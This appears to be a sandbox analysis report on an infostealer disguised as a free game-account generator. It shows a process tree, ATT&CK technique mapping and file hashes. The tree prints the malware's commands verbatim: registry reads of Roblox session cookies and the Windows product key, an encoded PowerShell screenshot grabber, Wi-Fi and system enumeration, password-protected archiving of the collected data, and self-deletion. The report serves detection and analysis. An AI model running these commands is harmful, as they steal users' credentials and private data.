- System Network Configuration Discovery: Wi-Fi Discovery
PID:2472 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:3132
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:3652
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:1912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:2360
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2036 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3dfz1l41\3dfz1l41.cmdline"5⤵PID:888
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC43A.tmp" "c:\Users\Admin\AppData\Local\Temp\3dfz1l41\CSC94913BAEB2A84EA28E8583C5A7A9326.TMP"6⤵PID:2684
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:224
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵PID:3824
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:3344
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2056
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3864
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1116
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5024
-
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3484
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1248
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:2108
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:932
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:2236
-
C:\Windows\system32\getmac.exegetmac4⤵PID:1440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI24682\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\pomfw.zip" *"3⤵PID:3320
-
C:\Users\Admin\AppData\Local\Temp\_MEI24682\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI24682\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\pomfw.zip" *4⤵
- Executes dropped EXE
PID:3088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:1800
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:2720
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵
- Suspicious behavior: EnumeratesProcesses
PID:472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:3880
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
PID:648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:3636
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:1712
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:3044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:1816
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe""3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4040 -
C:\Windows\system32\PING.EXEping localhost -n 34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1888
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2700
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
4System Network Configuration Discovery
2Internet Connection Discovery
1Wi-Fi Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD5f0f59cccd39a3694e0e6dfd44d0fa76d
SHA1fccd7911d463041e1168431df8823e4c4ea387c1
SHA25670466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401
SHA5125c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee
-
Filesize
1KB
MD583d94e8aa23c7ad2db6f972739506306
SHA1bd6d73d0417971c0077f772352d2f538a6201024
SHA256dfa5cbd243b304f47196c492bc2d8b29941a550c2f076ef8bdfca72755e71881
SHA5124224625e8ef8dadc72f1e1a1edfe2079656b14f2af94ce6128316481d96e9d0b6edf4de13fcdcc182038a2b29eb562b9246f944aecebfcb7c5ee8d7936b6287e
-
Filesize
1KB
MD5ba2f2592bf86e72a42353e010dd1c5a8
SHA10ed2f77ede44f519baf25bc9e32873429864bb2e
SHA2563e9815e3260259a445a6a3cc375e2bf83660239d73eb700812606c3d96bbcca6
SHA5124529ffc7e01b02d1225b43df890ccdc6ee6253b151bb6473132822785b0849c4c6080f0da496912857cb163bf804d13d03cdfaeecf0d2925a6ee92cddf78e826
-
Filesize
1KB
MD5d14dd9dd79514a51aa80745672486c21
SHA165d9555e2e80fbaaaab9cff16aa607601a36e7fe
SHA256496404417d08caf2a7a33f2ce7b10eb115f1829e11c72cd03bb86bdaa13e5a2c
SHA51285206bc9652142ecc6dd26c341bb7b7564e5959823175c29c80026236595f824a4fbae1d354b058f4ef064f08c966e2bf250ee4d8466cc0f19d0372b2c8217e4
-
Filesize
1KB
MD5aceb532691edad10db2e8f667c620234
SHA1cbd53a9d55e91eef3e4cd9eb384791770d996fc6
SHA25674620d00b6c373882639c878336cbac7456ed8380dcb05684b043b7d1ccb2ab8
SHA51288bb560b85c6bff1e389e20d51b176344ea745a0220549c8a4aa80185c66696b36bf3a080d5fc51c70ba025fd1b80facd58bc8939a555cba2c2a6bbffb36b09e
-
Filesize
4KB
MD5c22ecb178528e705ca19ebec8d055adb
SHA1a5bf7691ba8f2cb93947b9aab7e97d3b7406ef6c
SHA256acf7b52f5857b62cb5edfa4a6c5dc15a341308a6055120dad8cca8306adddd7f
SHA512d8259e4801d5c3c46d24eb8698be9801caff8738b66b3d7f1b793e1317757468704726431299ec40e25c0e4ebc718d35a2b6dde0ba02e1a0fca23d6ca29d6b91
-
Filesize
1KB
MD55fd0b090891f54f263d3e34e1d456af0
SHA1794f4d78584cf1165685bda2ad60f9152376f9a9
SHA25637b940b8b3c878e7924a30fee1a6bc74bfc12559bf1d41356be7a82d20063c62
SHA5120f30ea3fb2ca544c1eb8beb99497bbba2851f4e133353571181d4ebe73facc98e0f4c61912330c6ae1a29861412625ee04e04377828e3c8d66aeb8e029c3fc8b
-
Filesize
106KB
MD5870fea4e961e2fbd00110d3783e529be
SHA1a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA25676fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA5120b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88
-
Filesize
46KB
MD5db5ec505d7c19345ca85d896c4bd7ef4
SHA1c459bb6750937fbdc8ca078a74fd3d1e8461b11c
SHA256d3fb8bad482505eb4069fa2f2bb79e73f369a4181b7acc7abe9035ecbd39cec9
SHA5120d9fdb9054e397bc9035301e08532dc20717ec73ad27cf7134792a859ca234ab0cd4afa77d6cb2db8c35b7b0bccf49935630b3fe1bd0a83a9be228b9c3d8c629
-
Filesize
56KB
MD526e65481188fe885404f327152b67c5e
SHA16cd74c25cc96fb61fc92a70bdfbbd4a36fda0e3d
SHA256b76b63e8163b2c2b16e377114d41777041fcc948806d61cb3708db85cca57786
SHA5125b58fc45efebc30f26760d22f5fe74084515f1f3052b34b0f2d1b825f0d6a2614e4edaf0ce430118e6aaaf4bb8fcc540699548037f99a75dd6e53f9816068857
-
Filesize
104KB
MD5072e08b39c18b779446032bf2104247b
SHA1a7ddad40ef3f0472e3c9d8a9741bd97d4132086c
SHA256480b8366a177833d85b13415e5bb9b1c5fda0a093ea753940f71fa8e7fc8ed9b
SHA512c3cdfe14fd6051b92eeff45105c093dce28a4dcfd9f3f43515a742b9a8ee8e4a2dce637e9548d21f99c147bac8b9eb79bcbcd5fc611197b52413b8a62a68da02
-
Filesize
33KB
MD582d28639895b87f234a80017a285822a
SHA19190d0699fa2eff73435adf980586c866639205f
SHA2569ec1d9abac782c9635cdbbb745f6eab8d4c32d6292eebb9efd24a559260cb98e
SHA5124b184dcc8ccf8af8777a6192af9919bcebcdcddd2a3771ed277d353f3c4b8cb24ffa30e83ff8fbeca1505bf550ea6f46419a9d13fef7d2be7a8ac99320350cfe
-
Filesize
84KB
MD58bdd52b7bcab5c0779782391686f05c5
SHA1281aad75da003948c82a6986ae0f4d9e0ba988eb
SHA256d5001fbee0f9c6e3c566ac4d79705ba37a6cba81781eee9823682de8005c6c2a
SHA512086c5e628b25bc7531c2e2f73f45aa8f2182ac12f11f735b3adc33b65a078a62f7032daa58cc505310b26b4085cae91cb4fa0a3225fbe6f2b2f93287fee34d4c
-
Filesize
24KB
MD53f13115b323fb7516054ba432a53e413
SHA1340b87252c92c33fe21f8805acb9dc7fc3ff8999
SHA25652a43a55458c7f617eb88b1b23874f0b5d741e6e2846730e47f09f5499dda7f2
SHA5126b0383ee31d9bb5c1227981eb0ae5bb40e2d0a540bd605d24e5af455fd08935d726e5f327787d9340950311d8f7a655a7ea70635e1f95d33e089505f16ae64b9
-
Filesize
41KB
MD5abe1268857e3ace12cbd532e65c417f4
SHA1dd987f29aabc940f15cd6bd08164ff9ae95c282f
SHA2567110390fa56833103db0d1edbfd2fe519dd06646811402396eb44918b63e70d5
SHA512392ac00c9d9e5440a8e29e5bae3b1a8e7ffb22a01692dad261324058d8ef32fedf95e43a144b7e365f7f0fedb0efb6f452c7ccaee45e41e2d1def660d11173c1
-
Filesize
54KB
MD500a246686f7313c2a7fe65bbe4966e96
SHA1a6c00203afab2d777c99cc7686bab6d28e4f3f70
SHA256cd3ade57c12f66331cb4d3c39276cbb8b41176026544b1ca4719e3ce146efe67
SHA512c0e0f03616336f04678a0a16592fdc91aaa47c9bf11500a5dc3696aef4481f2fcbd64a82be78b30f3ffd4372c9e505edb000bdf05f2ad07bac54a457bb20bf7e
-
Filesize
60KB
MD50c06eff0f04b3193a091aa6f77c3ff3f
SHA1fdc8f3b40b91dd70a65ada8c75da2f858177ca1b
SHA2565ecfe6f6ddf3b0a150e680d40c46940bc58334d0c622584772800913d436c7e2
SHA512985974e1487bbb8f451588f648a4cf4d754dbfc97f1ab4733dd21cdeb1a3abad017c34ed6ee4bc89ac01ea19b6060ea8f817693336133d110b715c746d090e49
-
Filesize
1.4MB
MD551f7b2f6b021864e40116c3cd9b2bdb5
SHA1afc440a9dd43a4dc68d80e131da3c32a312a8459
SHA256858be1ee68af27691773c438b67e643fdbaf9b8abd60bc716f30d1e1453df8de
SHA512873eb4a1c45a0704440160cd0551f4de3e82d25aafbea91691b0d60e896f019e5822356fc0fa083aaea89935793a38c4d06b23da2018c3a231d769496c7a2523
-
Filesize
123KB
MD534688fb7b6461ab4d763382b38da4686
SHA11de4c8bdf5fc67a8ae128cd5b75fa81d275625f3
SHA256eb082d50c72c030e1aefd2b840063f1d1db89fc372d356c6061ddff312196b0a
